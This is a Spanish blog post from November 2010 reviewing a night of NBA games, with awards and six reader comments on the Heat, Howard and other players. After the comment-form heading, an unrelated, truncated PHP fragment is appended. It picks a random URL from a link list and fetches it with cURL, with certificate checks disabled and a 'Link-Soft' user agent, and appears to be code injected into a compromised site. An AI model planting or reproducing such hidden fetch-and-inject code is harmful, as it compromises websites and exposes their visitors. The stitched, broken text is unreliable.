La crónica (27/11/2010)

28 de November de 2010 por TheDeerHunter

Otra derrota más de los Heat. La Octava. Sin argumentos para derrotar a un equipo serio como Dallas. Quitando aquel palizón contra Orlando en la primera semana y otro contra Phoenix el resto de las victorias de este equipo han llegado contra equipos por debajo del 50%. Diciembre y dos giras por el Oeste pueden despejar dudas en la cabeza de Pat Riley.

Sus rivales en el Este ganaron todos. Orlando tuvo suerte contra Washington y un palmeo de Howard en el último segundo les dio una victoria que Arenas y Young estuvieron a punto de quedarse para ellos. Los Hawks hicieron lo propio en el Madison tampoco sin demasiado brillo. Ganaron a base de triples y ninguno de ellos fue de Joe Johnson, que falló los 6 que se tiró.
En los Bulls, tras la última derrota sin Rose había miedo de no poder contar con él. Estuvo y destrozó a los Kings, que no saben quién es titular ni quién es suplente. Es la 4ª derrota seguida y la 9ª en los últimos 10 partidos. Se hunden.

Ayer se jugaba el grueso de la jornada en el Este y es una de las pocas en el que el balance interconferencia queda a su favor. Los Cavs certificaron esto ganando a Memphis, con Mo Williams en un gran estado de forma.

Los Bucks, sin Bogut y necesitadísimos de victorias aprovecharon el cortocircuitos mental de Stephen Jackson para llevarse el partido contra Bobcats. Sin Bogut, Jennings estuvo bien arropado por sus compañeros y fue el mejor del choque. Los Sixers también necesitaban la victoria contra los Nets y la lograron a pesar del gran partido de Harris y de Lopez. Me llama la atención que han mandado a Terrence Williams a la liga de desarrollo. Ellos sabrán…

Finalmente buen partido entre Warriors y Wolves. Dorell Wright anotó nada menos que 9 triples para sacar el duelo. Récord en triples de la franquicia… y ya tiene mérito precisamente allí.

PREMIOS

MVP: Hoy soy incapaz de decidirme. Podría escoger a Monta Ellis (26 puntos, 10 asistencias, 4 rebotes y 7 robos), o a Brandon Jennings (32 puntos, 7 asistencias, 2 robos) o a Mo Williams (25 puntos, 12 asistencias, 5 rebotes y 2 robos) o a Dwight Howard (32 puntos, 11 rebotes, 2 tapones) o a Derrick Rose (30 puntos, 7 rebotes y 7 asistencias) o a Jrue Holiday (20 puntos, 13 asistencias, 4 rebotes, 3 robos) o a…

Rookie: Buenos minutos de Larry Sanders como titular (10 puntos, 3 rebotes y 2 tapones). Xavier Henry ya parece totalmente inserido en el quinteto titular de los Grizzlies. Ayer, 9 puntos, 2 rebotes y 1 tapón. Ayer jugaron 3 de los TOP5 pero como si no lo hubieran hecho. Y Wall lesionado de nuevo.

Sorpresa: Los Bucks ganaron pese a las bajas de Bogut, Gooden, Maggette y Delfino. Ersan Ilyasova secundó perfectamente a Brandon Jennings con 17 puntos, 9 rebotes, 6 asistencias y 3 robos.

Decepción: Cabeza, hay que tener cabeza. Stephen Jackson fue expulsado del partido cuando sólo se llevaban disputados 4 minutos por protestar una falta. Sin él el partido cambió completamente.

Esfuerzo en vano: Cuarto 20-20 de la temporada para Kevin Love. Ya no parece tan espectacular como al principio. De todas maneras sigue siendo Mr. Esfuerzo en vano de la temporada. Ayer derrota frente a Golden State.

Comenta

6 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Lo de Terrence Williams es a modo de castigo por indisciplina en los entrenamientos.

      Citar

  2. Denise dice:
    #2

    Grande Howard. Vaya partidazo que se ha marcado dando la victoria a 4 segundos, y un minuto antes, metiendo dos tiros libres importantísimos. De todas formas, sigo pidiendo el cese de Van Gundy, no se puede sufrir tanto ante estos Wizards que no contaban con Wall, y Arenas e Hinrich, los otros dos jugadores con más calidad técnica del equipo, se han pasado el partido tirando mandarinas. Me reafirmo en mi opinión sobre McGee, es un decente pivot que en un par de años debería promediar 14-10 con la gorra, Blatche también es un crack, pero tiene una actitud bastante pasota.
    Otra derrota de los Heat. Cualquier pivot les hace daño, hasta un manco como Chandler le destroza la pintura. De todas formas, me dan miedo y respeto todavía a los Heat. Por los Mavs, que bueno es Barea, otro que me encanta.
    Qué le pasa a Marc Gasol? Su nivel está siendo muyyy discreto.

      Citar

  3. xapa_croack dice:
    #3

    Vaya disaster de heats…. todo el mundo esperaba minimamente comptevidad contra los grandes, haber si se ponen para el dia de navidad, sino no comeremos pavo.

      Citar

  4. sr. Lagarto dice:
    #4

    A ver, a ver…

      Citar

  5. univerzee dice:
    #5

    Cuanto tiempo sin pasarme por aquí… pero no es tarde. The Deer Hunter… podría decir aquello de “ya lo dije yo” hace bastante al inicio de temporada, y antes, pero en mi blog esta aún el post anunciando todo esto de MIA… para una vez que acierto, dejame que lo diga jeje. A ver si no se como ni los turrones Spoeltra y va a ser que me equivoco jojo.
    Por cierto, ya te decia de Wade… creo que firmó hace unos partidos su peor partido como profesional, que se dice fácil.
    Saludos!

      Citar

  6. TheDeerHunter dice:
    #6

    Doy fe que ya lo dijiste univerzee.
    De hecho, lo del tema de lo decisivas que van a ser las giras por el oeste son ideas tuyas sobre las que estoy bastante de acuerdo… el único “pero” es que tal y como está el equipo no tengo muy claro si Riley estará dispuesto a arremangarse si no ve claro el asunto de aparecer como “milagroso” con ciertas garantías de éxito. Ahora mismo quizás no las puede tener y aguanta a Spoelstra hasta el final de campaña…
    De Wade lo considero más circunstancial que otra cosa. Estoy seguro que eso lo solucionarán pronto… siempre partiendo de la base que ni uno ni otro podrán seguir haciendo los mismo números compartiendo protagonismo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>